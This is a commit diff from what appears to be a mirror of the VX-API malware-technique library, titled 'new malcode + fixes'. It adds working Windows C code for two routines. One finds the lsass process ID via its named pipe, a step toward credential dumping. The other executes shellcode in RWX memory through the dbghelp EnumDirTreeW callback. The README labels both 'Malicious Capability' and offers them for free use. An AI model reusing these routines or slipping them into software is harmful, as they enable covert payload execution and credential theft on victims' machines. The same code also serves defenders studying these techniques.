mirror of https://github.com/vxunderground/VX-API
new malcode + fixes
This commit is contained in:
parent
8138d0abe1
commit
24f69a35ba
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.252
|
||||
Version: 2.0.266
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -131,6 +131,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| UacBypassFodHelperMethod | winscripting.blog | Malicious Capability |
|
||||
| MpfGetLsaPidFromServiceManager | modexp | Malicious Capability |
|
||||
| MpfGetLsaPidFromRegistry | modexp | Malicious Capability |
|
||||
| MpfGetLsaPidFromNamedPipe | modexp | Malicious Capability |
|
||||
| ShellcodeExecViaCertEnumSystemStore | alfarom256 and aahmad097| Malicious Capability |
|
||||
| ShellcodeExecViaCDefFolderMenu_Create2 | alfarom256 and aahmad097| Malicious Capability |
|
||||
| ShellcodeExecViaCertEnumSystemStoreLocation | alfarom256 and aahmad097| Malicious Capability |
|
||||
|
@ -139,6 +140,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| ShellcodeExecViaEnumDateFormatsW | alfarom256 and aahmad097| Malicious Capability |
|
||||
| ShellcodeExecViaEnumDesktopsW | alfarom256 and aahmad097| Malicious Capability |
|
||||
| ShellcodeExecViaEnumDesktopWindows | alfarom256 and aahmad097| Malicious Capability |
|
||||
| ShellcodeExecViaEnumDirTreeW | alfarom256 and aahmad097| Malicious Capability |
|
||||
|
||||
|
||||
# Todo list
|
||||
|
|
|
@ -19,6 +19,7 @@ typedef NTSTATUS(NTAPI* NTQUERYINFORMATIONFILE)(HANDLE, PIO_STATUS_BLOCK, PVOID,
|
|||
typedef NTSTATUS(NTAPI* NTOPENFILE)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PIO_STATUS_BLOCK, ULONG, ULONG);
|
||||
typedef BOOL(NTAPI* RTLDOSPATHNAMETONTPATHNAME_U)(PCWSTR, PUNICODE_STRING, PCWSTR*, PRTL_RELATIVE_NAME_U);
|
||||
typedef NTSTATUS(NTAPI* NTCREATEFILE)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PIO_STATUS_BLOCK, PLARGE_INTEGER, ULONG, ULONG, ULONG, ULONG, PVOID, ULONG);
|
||||
typedef NTSTATUS(NTAPI* NTFSCONTROLFILE)(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);
|
||||
|
||||
|
||||
|
||||
|
@ -95,4 +96,13 @@ typedef BOOL(WINAPI* CERTENUMSYSTEMSTORE)(DWORD, PVOID, PVOID, PFN_CERT_ENUM_SYS
|
|||
typedef BOOL(WINAPI* CERTENUMSYSTEMSTORELOCATION)(DWORD, PVOID, PFN_CERT_ENUM_SYSTEM_STORE_LOCATION);
|
||||
typedef HCERTSTORE(WINAPI* CERTOPENSTORE)(LPCSTR, DWORD, HCRYPTPROV_LEGACY, DWORD, PVOID);
|
||||
typedef PCCERT_CHAIN_CONTEXT(WINAPI* CERTFINDCHAININSTORE)(HCERTSTORE, DWORD, DWORD, DWORD, PVOID, PCCERT_CHAIN_CONTEXT);
|
||||
typedef BOOL(WINAPI* CERTCLOSESTORE)(HCERTSTORE, DWORD);
|
||||
typedef BOOL(WINAPI* CERTCLOSESTORE)(HCERTSTORE, DWORD);
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
DBGHELP IMPORT
|
||||
*******************************************/
|
||||
typedef BOOL(WINAPI* SYMINITIALIZEW)(HANDLE, PCWSTR, BOOL);
|
||||
typedef BOOL(WINAPI* SYMCLEANUP)(HANDLE);
|
||||
typedef BOOL(WINAPI* ENUMDIRTREEW)(HANDLE, PCWSTR, PCWSTR, PWSTR, LPVOID, PVOID);
|
|
@ -0,0 +1,194 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetPidFromPidBruteForcingExW(_In_ PWCHAR ProcessNameWithExtension)
|
||||
{
|
||||
UNICODE_STRING NtfsRoot = { 0 };
|
||||
IO_STATUS_BLOCK IoBlock = { 0 };
|
||||
HANDLE hDevice = NULL;
|
||||
OBJECT_ATTRIBUTES Attributes = { 0 };
|
||||
HMODULE hModule = NULL, hShlwapi = NULL;
|
||||
PFILE_PROCESS_IDS_USING_FILE_INFORMATION ProcessIdArray = NULL;
|
||||
NTSTATUS Status = STATUS_SUCCESS;
|
||||
DWORD ProcessId = ERROR_SUCCESS, dwProcessInformationListArrayLength = 16384;
|
||||
|
||||
NTCREATEFILE NtCreateFile = NULL;
|
||||
NTCLOSE NtClose = NULL;
|
||||
NTQUERYINFORMATIONFILE NtQueryInformationFile = NULL;
|
||||
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
|
||||
PATHSTRIPPATHW PathStripPathW = NULL;
|
||||
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
|
||||
|
||||
if (!hModule || !hShlwapi)
|
||||
return 0;
|
||||
|
||||
NtCreateFile = (NTCREATEFILE)GetProcAddressA((DWORD64)hModule, "NtCreateFile");
|
||||
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
|
||||
NtQueryInformationFile = (NTQUERYINFORMATIONFILE)GetProcAddressA((DWORD64)hModule, "NtQueryInformationFile");
|
||||
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
|
||||
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
|
||||
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation || !PathStripPathW)
|
||||
return 0;
|
||||
|
||||
RtlInitUnicodeString(&NtfsRoot, L"\\NTFS\\");
|
||||
|
||||
InitializeObjectAttributes(&Attributes, &NtfsRoot, OBJ_CASE_INSENSITIVE, NULL, NULL);
|
||||
|
||||
Status = NtCreateFile(&hDevice, GENERIC_READ | SYNCHRONIZE, &Attributes, &IoBlock, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN, 0, NULL, 0);
|
||||
if (!NT_SUCCESS(Status))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ProcessIdArray = (PFILE_PROCESS_IDS_USING_FILE_INFORMATION)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, dwProcessInformationListArrayLength);
|
||||
if (ProcessIdArray == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ZeroMemory(&IoBlock, sizeof(IO_STATUS_BLOCK));
|
||||
|
||||
Status = NtQueryInformationFile(hDevice, &IoBlock, ProcessIdArray, dwProcessInformationListArrayLength, FileProcessIdsUsingFileInformation);
|
||||
if (!NT_SUCCESS(Status))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwX = 0; dwX < ProcessIdArray->NumberOfProcessIdsInList; dwX++)
|
||||
{
|
||||
WCHAR ImageName[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
SYSTEM_PROCESS_IMAGE_NAME_INFORMATION SystemProcessInformation = { 0 };
|
||||
|
||||
if (ProcessId != ERROR_SUCCESS)
|
||||
break;
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 4244)
|
||||
SystemProcessInformation.ProcessId = LongToHandle(ProcessIdArray->ProcessIdList[dwX]);
|
||||
#pragma warning( pop )
|
||||
SystemProcessInformation.ImageName.Buffer = ImageName;
|
||||
SystemProcessInformation.ImageName.Length = 0;
|
||||
SystemProcessInformation.ImageName.MaximumLength = sizeof(ImageName);
|
||||
|
||||
Status = NtQuerySystemInformation(SystemProcessIdInformation, &SystemProcessInformation, sizeof(SystemProcessInformation), NULL);
|
||||
if (!NT_SUCCESS(Status))
|
||||
continue;
|
||||
|
||||
if (SystemProcessInformation.ImageName.Buffer == NULL)
|
||||
continue;
|
||||
|
||||
PathStripPathW(SystemProcessInformation.ImageName.Buffer);
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 4244)
|
||||
if (StringCompareW(ProcessNameWithExtension, SystemProcessInformation.ImageName.Buffer) == ERROR_SUCCESS)
|
||||
ProcessId = ProcessIdArray->ProcessIdList[dwX];
|
||||
#pragma warning( pop )
|
||||
}
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (ProcessIdArray)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, ProcessIdArray);
|
||||
|
||||
if (hDevice)
|
||||
NtClose(hDevice);
|
||||
|
||||
if (hShlwapi)
|
||||
FreeLibrary(hShlwapi);
|
||||
|
||||
return ProcessId;
|
||||
}
|
||||
|
||||
DWORD GetPidFromPidBruteForcingExA(_In_ PCHAR ProcessNameWithExtension)
|
||||
{
|
||||
UNICODE_STRING NtfsRoot = { 0 };
|
||||
IO_STATUS_BLOCK IoBlock = { 0 };
|
||||
HANDLE hDevice = NULL;
|
||||
OBJECT_ATTRIBUTES Attributes = { 0 };
|
||||
HMODULE hModule = NULL, hShlwapi = NULL;
|
||||
PFILE_PROCESS_IDS_USING_FILE_INFORMATION ProcessIdArray = NULL;
|
||||
NTSTATUS Status = STATUS_SUCCESS;
|
||||
DWORD ProcessId = ERROR_SUCCESS, dwProcessInformationListArrayLength = 16384;
|
||||
WCHAR ProcessParameterTransformed[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
NTCREATEFILE NtCreateFile = NULL;
|
||||
NTCLOSE NtClose = NULL;
|
||||
NTQUERYINFORMATIONFILE NtQueryInformationFile = NULL;
|
||||
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
|
||||
PATHSTRIPPATHW PathStripPathW = NULL;
|
||||
|
||||
if (CharStringToWCharString(ProcessParameterTransformed, ProcessNameWithExtension, StringLengthA(ProcessNameWithExtension) == 0))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
|
||||
|
||||
if (!hModule || !hShlwapi)
|
||||
return 0;
|
||||
|
||||
NtCreateFile = (NTCREATEFILE)GetProcAddressA((DWORD64)hModule, "NtCreateFile");
|
||||
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
|
||||
NtQueryInformationFile = (NTQUERYINFORMATIONFILE)GetProcAddressA((DWORD64)hModule, "NtQueryInformationFile");
|
||||
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
|
||||
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
|
||||
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation || !PathStripPathW)
|
||||
return 0;
|
||||
|
||||
RtlInitUnicodeString(&NtfsRoot, L"\\NTFS\\");
|
||||
|
||||
InitializeObjectAttributes(&Attributes, &NtfsRoot, OBJ_CASE_INSENSITIVE, NULL, NULL);
|
||||
|
||||
Status = NtCreateFile(&hDevice, GENERIC_READ | SYNCHRONIZE, &Attributes, &IoBlock, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN, 0, NULL, 0);
|
||||
if (!NT_SUCCESS(Status))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ProcessIdArray = (PFILE_PROCESS_IDS_USING_FILE_INFORMATION)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, dwProcessInformationListArrayLength);
|
||||
if (ProcessIdArray == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ZeroMemory(&IoBlock, sizeof(IO_STATUS_BLOCK));
|
||||
|
||||
Status = NtQueryInformationFile(hDevice, &IoBlock, ProcessIdArray, dwProcessInformationListArrayLength, FileProcessIdsUsingFileInformation);
|
||||
if (!NT_SUCCESS(Status))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwX = 0; dwX < ProcessIdArray->NumberOfProcessIdsInList; dwX++)
|
||||
{
|
||||
WCHAR ImageName[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
SYSTEM_PROCESS_IMAGE_NAME_INFORMATION SystemProcessInformation = { 0 };
|
||||
|
||||
if (ProcessId != ERROR_SUCCESS)
|
||||
break;
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 4244)
|
||||
SystemProcessInformation.ProcessId = LongToHandle(ProcessIdArray->ProcessIdList[dwX]);
|
||||
#pragma warning( pop )
|
||||
SystemProcessInformation.ImageName.Buffer = ImageName;
|
||||
SystemProcessInformation.ImageName.Length = 0;
|
||||
SystemProcessInformation.ImageName.MaximumLength = sizeof(ImageName);
|
||||
|
||||
Status = NtQuerySystemInformation(SystemProcessIdInformation, &SystemProcessInformation, sizeof(SystemProcessInformation), NULL);
|
||||
if (!NT_SUCCESS(Status))
|
||||
continue;
|
||||
|
||||
if (SystemProcessInformation.ImageName.Buffer == NULL)
|
||||
continue;
|
||||
|
||||
PathStripPathW(SystemProcessInformation.ImageName.Buffer);
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 4244)
|
||||
if (StringCompareW(ProcessParameterTransformed, SystemProcessInformation.ImageName.Buffer) == ERROR_SUCCESS)
|
||||
ProcessId = ProcessIdArray->ProcessIdList[dwX];
|
||||
#pragma warning( pop )
|
||||
}
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (ProcessIdArray)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, ProcessIdArray);
|
||||
|
||||
if (hDevice)
|
||||
NtClose(hDevice);
|
||||
|
||||
if (hShlwapi)
|
||||
FreeLibrary(hShlwapi);
|
||||
|
||||
return ProcessId;
|
||||
}
|
|
@ -1,96 +0,0 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetPidFromPidBruteForcingExW(_In_ PWCHAR ProcessNameWithExtension)
|
||||
{
|
||||
UNICODE_STRING NtfsRoot = { 0 };
|
||||
IO_STATUS_BLOCK IoBlock = { 0 };
|
||||
HANDLE hDevice = NULL;
|
||||
OBJECT_ATTRIBUTES Attributes = { 0 };
|
||||
HMODULE hModule = NULL, hShlwapi = NULL;
|
||||
PFILE_PROCESS_IDS_USING_FILE_INFORMATION ProcessIdArray = NULL;
|
||||
NTSTATUS Status = STATUS_SUCCESS;
|
||||
DWORD ProcessId = ERROR_SUCCESS, dwProcessInformationListArrayLength = 16384;
|
||||
|
||||
NTCREATEFILE NtCreateFile = NULL;
|
||||
NTCLOSE NtClose = NULL;
|
||||
NTQUERYINFORMATIONFILE NtQueryInformationFile = NULL;
|
||||
NTQUERYSYSTEMINFORMATION NtQuerySystemInformation = NULL;
|
||||
PATHSTRIPPATHW PathStripPathW = NULL;
|
||||
|
||||
hModule = GetModuleHandleEx2W(L"ntdll.dll");
|
||||
hShlwapi = TryLoadDllMultiMethodW((PWCHAR)L"shlwapi.dll");
|
||||
|
||||
if (!hModule || !hShlwapi)
|
||||
return 0;
|
||||
|
||||
NtCreateFile = (NTCREATEFILE)GetProcAddressA((DWORD64)hModule, "NtCreateFile");
|
||||
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
|
||||
NtQueryInformationFile = (NTQUERYINFORMATIONFILE)GetProcAddressA((DWORD64)hModule, "NtQueryInformationFile");
|
||||
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddressA((DWORD64)hModule, "NtQuerySystemInformation");
|
||||
PathStripPathW = (PATHSTRIPPATHW)GetProcAddressA((DWORD64)hShlwapi, "PathStripPathW");
|
||||
if (!NtCreateFile || !NtClose || !NtQueryInformationFile || !NtQuerySystemInformation || !PathStripPathW)
|
||||
return 0;
|
||||
|
||||
RtlInitUnicodeString(&NtfsRoot, L"\\NTFS\\");
|
||||
|
||||
InitializeObjectAttributes(&Attributes, &NtfsRoot, OBJ_CASE_INSENSITIVE, NULL, NULL);
|
||||
|
||||
Status = NtCreateFile(&hDevice, GENERIC_READ | SYNCHRONIZE, &Attributes, &IoBlock, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ, FILE_OPEN, 0, NULL, 0);
|
||||
if (!NT_SUCCESS(Status))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ProcessIdArray = (PFILE_PROCESS_IDS_USING_FILE_INFORMATION)HeapAlloc(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, dwProcessInformationListArrayLength);
|
||||
if (ProcessIdArray == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ZeroMemory(&IoBlock, sizeof(IO_STATUS_BLOCK));
|
||||
|
||||
Status = NtQueryInformationFile(hDevice, &IoBlock, ProcessIdArray, dwProcessInformationListArrayLength, FileProcessIdsUsingFileInformation);
|
||||
if (!NT_SUCCESS(Status))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
for (DWORD dwX = 0; dwX < ProcessIdArray->NumberOfProcessIdsInList; dwX++)
|
||||
{
|
||||
WCHAR ImageName[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
SYSTEM_PROCESS_IMAGE_NAME_INFORMATION SystemProcessInformation = { 0 };
|
||||
|
||||
if (ProcessId != ERROR_SUCCESS)
|
||||
break;
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 4244)
|
||||
SystemProcessInformation.ProcessId = LongToHandle(ProcessIdArray->ProcessIdList[dwX]);
|
||||
#pragma warning( pop )
|
||||
SystemProcessInformation.ImageName.Buffer = ImageName;
|
||||
SystemProcessInformation.ImageName.Length = 0;
|
||||
SystemProcessInformation.ImageName.MaximumLength = sizeof(ImageName);
|
||||
|
||||
Status = NtQuerySystemInformation(SystemProcessIdInformation, &SystemProcessInformation, sizeof(SystemProcessInformation), NULL);
|
||||
if (!NT_SUCCESS(Status))
|
||||
continue;
|
||||
|
||||
if (SystemProcessInformation.ImageName.Buffer == NULL)
|
||||
continue;
|
||||
|
||||
PathStripPathW(SystemProcessInformation.ImageName.Buffer);
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 4244)
|
||||
if (StringCompareW(ProcessNameWithExtension, SystemProcessInformation.ImageName.Buffer) == ERROR_SUCCESS)
|
||||
ProcessId = ProcessIdArray->ProcessIdList[dwX];
|
||||
#pragma warning( pop )
|
||||
}
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (ProcessIdArray)
|
||||
HeapFree(GetProcessHeapFromTeb(), HEAP_ZERO_MEMORY, ProcessIdArray);
|
||||
|
||||
if (hDevice)
|
||||
NtClose(hDevice);
|
||||
|
||||
if (hShlwapi)
|
||||
FreeLibrary(hShlwapi);
|
||||
|
||||
return ProcessId;
|
||||
}
|
|
@ -31,6 +31,34 @@
|
|||
#define FILE_OVERWRITE_IF 0x00000005
|
||||
#define FILE_MAXIMUM_DISPOSITION 0x00000005
|
||||
|
||||
#define FSCTL_PIPE_ASSIGN_EVENT CTL_CODE(FILE_DEVICE_NAMED_PIPE, 0, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_DISCONNECT CTL_CODE(FILE_DEVICE_NAMED_PIPE, 1, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_LISTEN CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_PEEK CTL_CODE(FILE_DEVICE_NAMED_PIPE, 3, METHOD_BUFFERED, FILE_READ_DATA)
|
||||
#define FSCTL_PIPE_QUERY_EVENT CTL_CODE(FILE_DEVICE_NAMED_PIPE, 4, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_TRANSCEIVE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 5, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
|
||||
#define FSCTL_PIPE_WAIT CTL_CODE(FILE_DEVICE_NAMED_PIPE, 6, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_IMPERSONATE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 7, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_SET_CLIENT_PROCESS CTL_CODE(FILE_DEVICE_NAMED_PIPE, 8, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_QUERY_CLIENT_PROCESS CTL_CODE(FILE_DEVICE_NAMED_PIPE, 9, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_GET_PIPE_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 10, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_SET_PIPE_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 11, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_GET_CONNECTION_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 12, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_SET_CONNECTION_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 13, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_GET_HANDLE_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 14, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_SET_HANDLE_ATTRIBUTE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 15, METHOD_BUFFERED, FILE_ANY_ACCESS)
|
||||
#define FSCTL_PIPE_FLUSH CTL_CODE(FILE_DEVICE_NAMED_PIPE, 16, METHOD_BUFFERED, FILE_WRITE_DATA)
|
||||
|
||||
#define FSCTL_PIPE_INTERNAL_READ CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2045, METHOD_BUFFERED, FILE_READ_DATA)
|
||||
#define FSCTL_PIPE_INTERNAL_WRITE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2046, METHOD_BUFFERED, FILE_WRITE_DATA)
|
||||
#define FSCTL_PIPE_INTERNAL_TRANSCEIVE CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2047, METHOD_NEITHER, FILE_READ_DATA | FILE_WRITE_DATA)
|
||||
#define FSCTL_PIPE_INTERNAL_READ_OVFLOW CTL_CODE(FILE_DEVICE_NAMED_PIPE, 2048, METHOD_BUFFERED, FILE_READ_DATA)
|
||||
|
||||
// Flags for query event
|
||||
|
||||
#define FILE_PIPE_READ_DATA 0x00000000
|
||||
#define FILE_PIPE_WRITE_SPACE 0x00000001
|
||||
|
||||
typedef struct _LSA_UNICODE_STRING {
|
||||
USHORT Length;
|
||||
USHORT MaximumLength;
|
||||
|
@ -1097,4 +1125,6 @@ typedef struct _RTL_RELATIVE_NAME_U{
|
|||
typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION{
|
||||
ULONG NumberOfProcessIdsInList;
|
||||
ULONG_PTR ProcessIdList[1];
|
||||
} FILE_PROCESS_IDS_USING_FILE_INFORMATION, * PFILE_PROCESS_IDS_USING_FILE_INFORMATION;
|
||||
} FILE_PROCESS_IDS_USING_FILE_INFORMATION, * PFILE_PROCESS_IDS_USING_FILE_INFORMATION;
|
||||
|
||||
typedef VOID(NTAPI* PIO_APC_ROUTINE)(PVOID ApcContext, _In_ PIO_STATUS_BLOCK IoStatusBlock, _In_ ULONG Reserved);
|
|
@ -47,7 +47,9 @@ int main(VOID)
|
|||
Sei.Payload = GlobalOpenCalcPayload;
|
||||
Sei.dwLengthOfPayloadInBytes = 277;
|
||||
|
||||
ShellcodeExecViaEnumDesktopsW(&Sei);
|
||||
//ShellcodeExecViaEnumDirTreeW(&Sei);
|
||||
|
||||
dwError = MpfGetLsaPidFromNamedPipe();
|
||||
|
||||
return dwError;
|
||||
}
|
||||
|
|
|
@ -0,0 +1,47 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD MpfGetLsaPidFromNamedPipe(VOID)
|
||||
{
|
||||
UNICODE_STRING Pipe = { 0 };
|
||||
NTOPENFILE NtOpenFile = NULL;
|
||||
NTFSCONTROLFILE NtfsControlFile = NULL;
|
||||
NTCLOSE NtClose = NULL;
|
||||
HMODULE hModule = NULL;
|
||||
IO_STATUS_BLOCK IoBlock = { 0 };
|
||||
OBJECT_ATTRIBUTES Attributes = { 0 };
|
||||
DWORD ProcessId = ERROR_SUCCESS;
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
NTSTATUS Status = STATUS_SUCCESS;
|
||||
LPSTR InputBuffer = (LPSTR)"ServerProcessId";
|
||||
|
||||
hModule = TryLoadDllMultiMethodW((PWCHAR)L"ntdll.dll");
|
||||
if (hModule == NULL)
|
||||
return -1;
|
||||
|
||||
NtOpenFile = (NTOPENFILE)GetProcAddressA((DWORD64)hModule, "NtOpenFile");
|
||||
NtfsControlFile = (NTFSCONTROLFILE)GetProcAddressA((DWORD64)hModule, "NtFsControlFile");
|
||||
NtClose = (NTCLOSE)GetProcAddressA((DWORD64)hModule, "NtClose");
|
||||
|
||||
if (!NtOpenFile || !NtfsControlFile || !NtClose)
|
||||
return -1;
|
||||
|
||||
RtlInitUnicodeString(&Pipe, L"\\Device\\NamedPipe\\lsass");
|
||||
|
||||
InitializeObjectAttributes(&Attributes, &Pipe, OBJ_CASE_INSENSITIVE, 0, NULL);
|
||||
|
||||
Status = NtOpenFile(&hHandle, FILE_READ_ATTRIBUTES, &Attributes, &IoBlock, FILE_SHARE_READ, NULL);
|
||||
if (!NT_SUCCESS(Status))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
Status = NtfsControlFile(hHandle, NULL, NULL, NULL, &IoBlock, FSCTL_PIPE_GET_PIPE_ATTRIBUTE, InputBuffer, (ULONG)StringLengthA(InputBuffer) + 1, &ProcessId, sizeof(DWORD));
|
||||
if (!NT_SUCCESS(Status))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hHandle)
|
||||
NtClose(hHandle);
|
||||
|
||||
return ProcessId;
|
||||
}
|
|
@ -0,0 +1,55 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD UnusedSubroutineDisposeableThreadEnumDirTreeW(LPVOID Param)
|
||||
{
|
||||
PSHELLCODE_EXECUTION_INFORMATION Sei = (PSHELLCODE_EXECUTION_INFORMATION)Param;
|
||||
SYMINITIALIZEW SymInitialize = NULL;
|
||||
SYMCLEANUP SymCleanup = NULL;
|
||||
ENUMDIRTREEW EnumDirTree = NULL;
|
||||
LPVOID BinAddress = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
HMODULE hModule = NULL;
|
||||
WCHAR DisposeableBuffer[512] = { 0 };
|
||||
|
||||
hModule = TryLoadDllMultiMethodW((PWCHAR)L"dbghelp.dll");
|
||||
if (hModule == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
SymInitialize = (SYMINITIALIZEW)GetProcAddressA((DWORD64)hModule, "SymInitializeW");
|
||||
SymCleanup = (SYMCLEANUP)GetProcAddressA((DWORD64)hModule, "SymCleanup");
|
||||
EnumDirTree = (ENUMDIRTREEW)GetProcAddressA((DWORD64)hModule, "EnumDirTreeW");
|
||||
|
||||
if (!SymInitialize || !SymCleanup || !EnumDirTree)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!SymInitialize(InlineGetCurrentProcess, NULL, TRUE))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
BinAddress = VirtualAlloc(NULL, Sei->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||
if (BinAddress == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
CopyMemoryEx(BinAddress, Sei->Payload, Sei->dwLengthOfPayloadInBytes);
|
||||
|
||||
EnumDirTree(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, BinAddress, NULL);
|
||||
|
||||
SymCleanup(InlineGetCurrentProcess);
|
||||
|
||||
bFlag = TRUE;
|
||||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
if (hModule)
|
||||
FreeLibrary(hModule);
|
||||
|
||||
if (BinAddress)
|
||||
VirtualFree(BinAddress, 0, MEM_RELEASE);
|
||||
|
||||
return (bFlag ? 0 : 0xffffffff);
|
||||
}
|
||||
|
||||
|
||||
BOOL ShellcodeExecViaEnumDirTreeW(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei)
|
||||
{
|
||||
return CreateThreadAndWaitForCompletion(UnusedSubroutineDisposeableThreadEnumDirTreeW, Sei, INFINITE);
|
||||
}
|
|
@ -170,8 +170,8 @@
|
|||
<ClCompile Include="GetPidFromEnumProcesses.cpp" />
|
||||
<ClCompile Include="GetPidFromNtQueryFileInformation.cpp" />
|
||||
<ClCompile Include="GetPidFromNtQuerySystemInformation.cpp" />
|
||||
<ClCompile Include="GetPidFromPidBruteForcingExW.cpp" />
|
||||
<ClCompile Include="GetPidFromPidBruteForcingW.cpp" />
|
||||
<ClCompile Include="GetPidFromPidBruteForcingEx.cpp" />
|
||||
<ClCompile Include="GetPidFromPidBruteForcing.cpp" />
|
||||
<ClCompile Include="GetPidFromWindowsTerminalService.cpp" />
|
||||
